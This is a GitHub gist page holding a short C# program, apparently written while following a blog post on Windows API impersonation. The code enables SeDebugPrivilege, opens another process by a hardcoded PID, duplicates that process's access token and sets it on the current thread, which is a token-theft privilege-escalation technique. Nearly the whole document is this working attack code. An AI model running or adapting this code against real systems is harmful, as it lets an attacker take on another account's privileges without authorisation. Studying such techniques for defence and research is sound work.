Last active
December 30, 2019 15:54
-
-
Save shelld0n/728c7a5d903a6fb143848f3152c86e17 to your computer and use it in GitHub Desktop.
Revisions
-
shelld0n renamed this gist
Dec 30, 2019 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes. -
Dec 30, 2019 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,50 @@ using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Runtime.InteropServices; namespace Token { class Program { static void Main(string[] args) { // Objectif is : https://0x00-0x00.github.io/research/2018/10/17/Windows-API-and-Impersonation-Part1.html // Enable SeDebugPrivilege ? string Privilege = "SeDebugPrivilege"; API.LUID luid = new API.LUID(); IntPtr hProcess = API.GetCurrentProcess(); IntPtr hToken; if (!API.OpenProcessToken(hProcess, API.TOKEN_QUERY | API.TOKEN_ADJUST_PRIVILEGES, out hToken)) { Console.WriteLine("No tokens for current process"); Environment.Exit(2); }; if (!API.LookupPrivilegeValue(null, Privilege, out luid)) { Console.WriteLine("No handle for privilege"); Environment.Exit(2); }; API.LUID_AND_ATTRIBUTES luAttr = new API.LUID_AND_ATTRIBUTES { Luid = luid, Attributes = API.LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED }; API.TOKEN_PRIVILEGES tp = new API.TOKEN_PRIVILEGES { PrivilegeCount = 1, Privileges = new API.LUID_AND_ATTRIBUTES[1] }; tp.Privileges[0] = luAttr; API.TOKEN_PRIVILEGES oldState = new API.TOKEN_PRIVILEGES(); // Our old state. UInt32 trash; if (!API.AdjustTokenPrivileges(hToken, false, ref tp, (UInt32)Marshal.SizeOf(tp), ref oldState, out trash)) { Console.WriteLine("Can't Adjust access Token"); Environment.Exit(2); }; // Duplicate Tokens for system process and use them Console.WriteLine("your journey just started"); IntPtr test = API.OpenProcess(API.ProcessAccessFlags.QueryInformation, true, 1340); //IntPtr test = API.GetCurrentProcess(); if (test == IntPtr.Zero) Console.WriteLine("No Handle to process !"); IntPtr tokenHandle; bool result_token = API.OpenProcessToken(test, API.TOKEN_READ | API.TOKEN_IMPERSONATE | API.TOKEN_DUPLICATE, out tokenHandle); Console.WriteLine(result_token); IntPtr DuplicatedToken = new IntPtr(); bool result_duplicate = API.DuplicateToken(tokenHandle, 2, ref DuplicatedToken); Console.WriteLine(result_duplicate); bool result_settoken = API.SetThreadToken(IntPtr.Zero, DuplicatedToken); Console.WriteLine(result_settoken); Console.ReadKey(); //System.Diagnostics.Process.Start("CMD.exe", "whoami"); Console.WriteLine(Environment.UserName); Console.ReadKey(); } } }